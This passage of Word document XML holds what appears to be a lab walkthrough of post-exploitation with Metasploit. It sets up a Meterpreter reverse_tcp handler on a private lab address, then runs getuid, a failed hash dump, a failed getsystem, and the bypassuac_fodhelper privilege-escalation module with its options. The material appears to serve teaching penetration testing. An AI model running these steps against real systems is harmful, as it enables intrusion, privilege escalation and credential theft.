        </w:rPr>
        <w:t>msf6 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684CAFE" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="1894"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>oad windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C16FD" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:ind w:left="840" w:right="5682"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; exploit -j -z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Exploit running as background job 0. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; sessions -i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAC1E6" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AD7429" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E4067" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: Win_User-PC\Win_User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909A4D4" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62054B0E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2738"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
        </w:rPr>
        <w:t>As a user, you don’t have privileges to dump hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D4376" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB1C481" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; run post/windows/gather/smart_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC8360" w14:textId="25CF8545" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="90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6560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3448967D" wp14:editId="0A48CC3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="42545" cy="175260"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="59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45" cy="17526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3694E6" id="Rectangle 36" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:.1pt;width:3.35pt;height:13.8pt;z-index:1574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" fillcolor="yellow" stroked="f">
                <w10:wrap anchorx="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:t>[-] Insufficient privileges to dump hashes!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8BB23" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74900F91" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; getsystem -t 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B23692" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="2642"/>
      </w:pPr>
      <w:r>
        <w:t>[-] 2001: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4537C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42638AB9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCDAA67" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Backgrounding session 1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F3166" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E6D2D3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="292" w:lineRule="exact"/>
        <w:ind w:left="2626" w:right="3221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>Escalate!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32A80A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; use exploit/windows/local/bypassua</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>c_fodhelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55657B19" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130447A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/local/bypassuac_fodhelper) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFC05B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E433A34" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="839"/>
          <w:tab w:val="left" w:pos="11313"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="485" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
        <w:t>Module options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-33"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>(exploit/windows/local/bypassuac_fodhelper):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C99E2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18484766" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1816"/>
        </w:tabs>
        <w:spacing w:before="82"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Current Setting Requi</w:t>
      </w:r>
      <w:r>
        <w:t>red Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7D4CB" w14:textId="3E9307FA" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2608"/>
          <w:tab w:val="left" w:pos="3141"/>
          <w:tab w:val="left" w:pos="3463"/>
          <w:tab w:val="left" w:pos="4475"/>
        </w:tabs>
        <w:ind w:left="149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51168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FC2101A" wp14:editId="0CB95F8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="58" name="Lin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295" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="13411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C0F06E" id="Line 35" o:spid="_x0000_s1026" style="position:absolute;z-index:15751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in,8.15pt" to="87.85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" strokeweight=".37253mm">
                <v:stroke dashstyle="dash"/>
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:t xml:space="preserve">-  </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB4731" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3177"/>
          <w:tab w:val="left" w:pos="4015"/>
        </w:tabs>
        <w:ind w:left="840" w:right="3616"/>
      </w:pPr>
      <w:r>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The session to run this module on. Payload options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(windows/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46D54E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1881"/>
        </w:tabs>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Current Setting Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71D525" w14:textId="37FAB0A5" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr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6272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32F0955B" wp14:editId="76911C61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="57" name="Freeform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1295" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 1440 1440"/>
                            <a:gd name="T1" fmla="*/ T0 w 317"/>
                            <a:gd name="T2" fmla="+- 0 1757 1440"/>
                            <a:gd name="T3" fmla="*/ T2 w 31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7">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="317" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="13411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6C4100" id="Freeform 34" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:8.15pt;width:15.85pt;height:.1pt;z-index:-157102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" path="m,l317,e" filled="f" strokeweight=".37253mm">
                <v:stroke dashstyle="dash"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;20129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606784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="529E8AB7" wp14:editId="6B510D8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1371600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97155</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="759460" cy="13970"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="53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9460" cy="13970"/>
                          <a:chOff x="2160" y="153"/>
                          <a:chExt cx="1196" cy="22"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="54" name="Line 33"/>
                        <wps:cNvCnPr>
                          <a:cxnSpLocks noChangeShapeType="1"/>
                        </wps:cNvCnPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2160" y="163"/>
                            <a:ext cx="396" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="13411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AutoShape 32"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2558" y="163"/>
                            <a:ext cx="478" cy="2"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2558 2558"/>
                              <a:gd name="T1" fmla="*/ T0 w 478"/>
                              <a:gd name="T2" fmla="+- 0 2796 2558"/>
                              <a:gd name="T3" fmla="*/ T2 w 478"/>
                              <a:gd name="T4" fmla="+- 0 2798 2558"/>
                              <a:gd name="T5" fmla="*/ T4 w 478"/>
                              <a:gd name="T6" fmla="+- 0 3036 2558"/>
                              <a:gd name="T7" fmla="*/ T6 w 47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</a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="478">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="238" y="0"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="240" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="478" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:noFill/>
                          <a:ln w="13411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3038" y="163"/>
                            <a:ext cx="317" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="13411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BFBABF" id="Group 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:108pt;margin-top:7.65pt;width:59.8pt;height:1.1pt;z-index:-15709696;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2160,153" coordsize="1196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">
                <v:line id="Line 33" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="2160,163" to="2556,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" strokeweight=".37253mm">
                  <v:stroke dashstyle="dash"/>
                </v:line>
                <v:shape id="AutoShape 32" o:spid="_x0000_s1028" style="position:absolute;left:2558;top:163;width:478;height:2;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="47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" path="m,l238,t2,l478,e" filled="f" strokeweight=".37253mm">
                  <v:stroke dashstyle="dash"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;238,0;240,0;478,0" o:connectangles="0,0,0,0"/>
                </v:shape>
                <v:line id="Line 31" o:spid="_x0000_s1029" style="position:absolute;visibility:visible;mso-wrap-style:square" from="3038,163" to="3355,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" strokeweight=".37253mm">
                  <v:stroke dashstyle="dash"/>
                </v:lin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7296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="273C7356" wp14:editId="7C5B5F0C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2216150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="407035" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="52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7035" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 3490 3490"/>
                            <a:gd name="T1" fmla="*/ T0 w 641"/>
                            <a:gd name="T2" fmla="+- 0 3809 3490"/>
                            <a:gd name="T3" fmla="*/ T2 w 641"/>
                            <a:gd name="T4" fmla="+- 0 3811 3490"/>
                            <a:gd name="T5" fmla="*/ T4 w 641"/>
                            <a:gd name="T6" fmla="+- 0 4130 3490"/>
                            <a:gd name="T7" fmla="*/ T6 w 64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641">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="319" y="0"/>
                              </a:lnTo>
                              <a:moveTo>
                                <a:pt x="321" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="640" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="13411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A6E428" id="AutoShape 29" o:spid="_x0000_s1026" style="position:absolute;margin-left:174.5pt;margin-top:8.15pt;width:32.05pt;height:.1pt;z-index:-157091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4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" path="m,l319,t2,l640,e" filled="f" strokeweight=".37253mm">
                <v:stroke dashstyle="3 1"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;202565,0;203835,0;406400,0" o:connectangles="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607808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55217073" wp14:editId="5517998A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2708275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97155</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="558165" cy="13970"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="49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8165" cy="13970"/>
                          <a:chOff x="4265" y="153"/>
                          <a:chExt cx="879" cy="22"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="50" name="AutoShape 28"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4264" y="163"/>
                            <a:ext cx="718" cy="2"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4265 4265"/>
                              <a:gd name="T1" fmla="*/ T0 w 718"/>
                              <a:gd name="T2" fmla="+- 0 4502 4265"/>
                              <a:gd name="T3" fmla="*/ T2 w 718"/>
                              <a:gd name="T4" fmla="+- 0 4505 4265"/>
                              <a:gd name="T5" fmla="*/ T4 w 718"/>
                              <a:gd name="T6" fmla="+- 0 4742 4265"/>
                              <a:gd name="T7" fmla="*/ T6 w 718"/>
                              <a:gd name="T8" fmla="+- 0 4745 4265"/>
                              <a:gd name="T9" fmla="*/ T8 w 718"/>
                              <a:gd name="T10" fmla="+- 0 4982 4265"/>
                              <a:gd name="T11" fmla="*/ T10 w 71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  <a:cxn ang="0">
                                <a:pos x="T5" y="0"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T7" y="0"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T9" y="0"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T11" y="0"/>
                              </a:cxn>
                            </a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="718">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="237" y="0"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="240" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="477" y="0"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="480" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="717" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:noFill/>
                          <a:ln w="13411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Line 27"/>
                        <wps:cNvCnPr>
                          <a:cxnSpLocks noChangeShapeType="1"/>
                        </wps:cNvCnPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4985" y="163"/>
                            <a:ext cx="158" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="13411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3F8D5F" id="Group 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:213.25pt;margin-top:7.65pt;width:43.95pt;height:1.1pt;z-index:-15708672;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="4265,153" coordsize="879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">
                <v:shape id="AutoShape 28" o:spid="_x0000_s1027" style="position:absolute;left:4264;top:163;width:718;height:2;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="71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" path="m,l237,t3,l477,t3,l717,e" filled="f" strokeweight=".37253mm">
                  <v:stroke dashstyle="dash"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;237,0;240,0;477,0;480,0;717,0" o:connectangles="0,0,0,0,0,0"/>
                </v:shape>
                <v:line id="Line 27" o:spid="_x0000_s1028" style="position:absolute;visibility:visible;mso-wrap-style:square" from="4985,163" to="5143,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" strokeweight=".37253mm">
                  <v:stroke dashstyle="dash"/>
                </v:line>
